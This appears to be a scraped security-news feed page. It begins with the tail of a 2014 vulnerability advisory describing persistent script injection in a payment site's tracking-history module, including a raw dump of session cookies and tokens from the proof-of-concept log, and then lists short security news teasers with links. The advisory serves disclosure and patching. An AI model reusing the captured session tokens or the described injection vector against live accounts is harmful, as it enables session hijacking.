HaC80bwXscjqZ7KM6VOxULOB534=ORfX9pdr8ftxc9NyP0TmSJ4B0lSthjOGQCC5APAR7e1eNqnk3WEWcoW8m47mGv-qtCkk_wxTnj2is1B5e2-Kr7_w3FTcxxijAdsyOnXSSh1GN9RvhP0tzJDAlTj7PoC-ZLBPhm; jYNTsouSlksxSbcE1jOBQOPko-K=sIIguAH9hGChn9skMeEk7kMAkbh8NnJGw8uw8Gg2cZDW6RY7p-DHlKFuzzCbwR051WG-vanSiKwnmGt63ezy4id7zhoqSUf-VzVZlUp6Zfj35mOgidWjeovRZ-ndsuIoK4qrVW; ppip_signup=; SEGM=bRdV1vB0ebq9RKdAb3xSHowCi6QnnlCiDOLNk8i1mAuLl1vTbzHQwWajSsMe8mvoWiJtY1GnpzN4Y-sixGy7BQ; upct=15; INSIDE_SEARCH_PARAMS=2%3bUS%3ben_US%3bAmerica%2fLos_Angeles; cookie_nav_is_vt_enabled=; cookie_nav_is_uum_enabled=; cookie_welcome=; Apache=10.73.8.155.1376519954817747; RouxWyWiKm3aD3COV0dah-P3yUq=egmP00IA-qk9vuZsjh7DQl8cgxlHKgmoe8i9E323Bp-MpImnx6YHKCB3RXYixNeq7NxdVj9wydXvLMRdleCmTq1OOzw2kpJMwWQObX6lH1RzNcFO; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=ExithdDwKWz2dQXDOUpwmT5khkaByIdeEGJLVsUwz0C7RLrkNi0ZTwwGipIxnBOMQ7IGJ9Akad32iNodKX64o4NdAewdQ4hnP3kq7EKeWoVcnCKix2ChNzbGDpxuCflcnu9uqvlJ1GMvnQeFOkz6SGALAhRX0dEmUlkZcGzrOAxxEik2vbP3V4zy_CbX7dlJtMuChya0ADSViy6T81gqqUicZR8ym8QOfnZP52T1we9-uCQDRLC5pLDMX4iCwJYIVi-Krevn3G7vtlqmn6iSvQDMGnZ-T5y0WwHMg18_5SL3yqerMBwDZrMEUi0VhZg8kVcRlXzvh_0BHai4RNmySI382ToAbAjCKp0K-0; SPARTAJSESSIONID=c133ecf12eeb1]

Note: The last request log shows the execution of the injected script code (payload) in the main `./powership/[x]` index path. The red highlighted login shows the credentials of the session and researcher account were the proof of concept has been demonstrated. The server information and session details are also separatly marked with two different colors.


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the tracking id information value in the separatly requesting history module table item listing. Restrict the input and filter request during the verification procedure in the history module itself. Implement an exception-handling to
prevent further exploitation with the same attack vector.


Security Risk:
==============
The security risk of the persistent input validation web vulnerability is estimated as medium(+). The vulnerability can be exploited locally by the attacker via low privileged user account, but also with multi user accounts like in vl security paypal bug bounty issue #108 m. the full remote scenario is to use interaction with a client user account. After the interaction the manipulated tracking information will become visible for both users (attacker&victim).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™



--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com

73,000 SECURITY CAMERAS VIEWABLE ONLINE DUE TO USE OF DEFAULT PASSWORDS

November 7, 2014, 3:52 pm
$
0
0
A website has made 73,011 security cameras from 256 different countries available for viewing online, all by hacking the cameras’ default usernames and passwords.

more here.........http://www.tripwire.com/state-of-security/top-security-stories/73000-security-cameras-viewable-online-due-to-use-of-default-passwords/

We analyze Cryptobot, aka Paycrypt

November 7, 2014, 3:53 pm
$
0
0
Recently during some research on encrypting ransomware we came across a new variant that brings some new features to the table. It will encrypt by utilizing the following javascript from being opened as an attachment from email (posing as some document file).

more here..........http://www.webroot.com/blog/2014/11/07/cryptobot/

Nearly 140k emails, u/p leaked from San Deigo Zoo

November 7, 2014, 3:55 pm
$
0
0
The following leak is brought to you by Paw Security(@PawSecReturns) && #Op4Pawz..

more here.........http://siph0n.in/exploits.php?id=3585

Guest Diary: Didier Stevens - Shellcode Detection with XORSearch

November 7, 2014, 3:56 pm
$
0
0
Frank Boldewin (http://www.reconstructer.org/) developed a shellcode detection method to find shellcode in Microsoft Office files, like .doc and .xls files. He released this as a feature of his OfficeMalScanner tool (http://www.reconstructer.org/code.html).

I consider this a very interesting detection method, and wanted to use this method on other file types like pictures. That’s what motivated to integrate this in my XORSearch tool.

more here...........https://isc.sans.edu/diary/Guest+Diary%3A+Didier+Stevens+-+Shellcode+Detection+with+XORSearch/18929

Global Web Crackdown Arrests 17, Seizes Hundreds Of Dark Net Domains

November 7, 2014, 3:58 pm
$
0
0
When “Operation Onymous” first came to light yesterday, it looked like a targeted strike against a few high value targets in the Dark Web drug trade. Now the full scope of that international law enforcement crackdown has been revealed, and it’s a scorched-earth purge of the Internet underground.

more here.......http://www.wired.com/2014/11/operation-onymous-dark-web-arrests/

Warrant for Your Arrest phone scams

November 7, 2014, 3:59 pm
$
0
0
Yesterday the scammers tried to hit the wrong victim! Neera Desai works for us at Malcovery Security as a Threat Intelligence Analyst on the malware team. She had received a voicemail on her phone while she was in one of her UAB Computer Science classes and knew that this could be a clue towards something big. She played it for me, and we provided a copy to law enforcement.

more here..........http://garwarner.blogspot.com/2014/11/warrant-for-your-arrest-phone-scams.html
Search

Passive UAC Elevation

November 7, 2014, 4:00 pm
$
0
0
I had a cool idea for a way to get the user to passively elevate your application without socially engineering them to do so or requiring exploits. Obviously you could just go ahead and start mass infecting executables, but that would cause a lot of unforeseen problems and would also mean digitally signed applications from trusted providers would now appear as untrusted files. A good alternative would be hijacking a single dll.

more here.............http://www.malwaretech.com/2014/11/passive-uac-elevation.html

Exposing Malware In Hidden Desktops Using CmdDesktopSwitcher

November 7, 2014, 4:02 pm
$
0
0
Have you ever come across malware that has opened a window that you just can’t see? You suspect it is a case of the malware setting the window as hidden. You fire up WinLister to enumerate the windows in the hopes of finding the hidden window but nothing shows up. If you have ever found yourself in this situation you may be dealing with malware that is hiding in a second desktop. In this article we will walk through the process of identifying extra desktops and switching between them with a new tool called CmdDesktopSwitch.exe.


more here..........http://herrcore.blogspot.ca/2014/11/exposing-malware-in-hidden-desktops.html

How I REVERSE ENGINEERED GOOGLE DOCS To Play Back Any Document’s Keystrokes

November 7, 2014, 4:04 pm
$
0
0
If you’ve ever typed anything into a Google Doc, you can now play it back as if it were a movie — like traveling through time to look over your own shoulder as you write.

This is possible because every document written in Google Docs since about May 2010 has a revision history that tracks every change, by every user, with timestamps accurate to the microsecond; these histories are available to anyone with “Edit” permissions; and I have written a piece of software that can find, decode, and rebuild the history for any given document.

more here.........http://features.jsomers.net/how-i-reverse-engineered-google-docs/

Tinfoil Chat

November 7, 2014, 4:06 pm
$
0
0
(TFC-CEV) is a high assurance encryption plugin for Pidgin IM client that combines free and open source hardware and software. Secure by design implementation provides a no-compromise layer over the standard and OTR encrypted communication, that addresses automatable attacks used by intelligence agencies for mass surveillance:

more here..........https://github.com/maqp/tfc/tree/cev

Paper: SIGPATH: A Memory Graph Based Approach for Program Data Introspection and Modification

November 7, 2014, 6:38 pm
$
0
0
Abstract. Examining and modifying data of interest in the memory of a tar-
get program is an important capability for security applications such as memory
forensics, rootkit detection, game hacking, and virtual machine introspection. In
this paper we present a novel memory graph based approach for program data
introspection and modification, which does not require source code, debugging
symbols, or any API in the target program. It takes as input a sequence of mem-
ory snapshots taken while the program executes, and produces a path signature,
which can be used in different executions of the program to efficiently locate and
traverse the in-memory data structures where the data of interest is stored. We
have implemented our approach in a tool called SIGPATH. We have applied SIG-
PATH to game hacking, building cheats for 10 popular real-time and turn-based
games, and for memory forensics, recovering from snapshots the contacts a user
has stored in four IM applications including Skype and Yahoo Messenger.


more here..........http://software.imdea.org/~juanca/papers/sigpath_esorics14.pdf
Viewing all 8064 articles
Browse latest View live
Search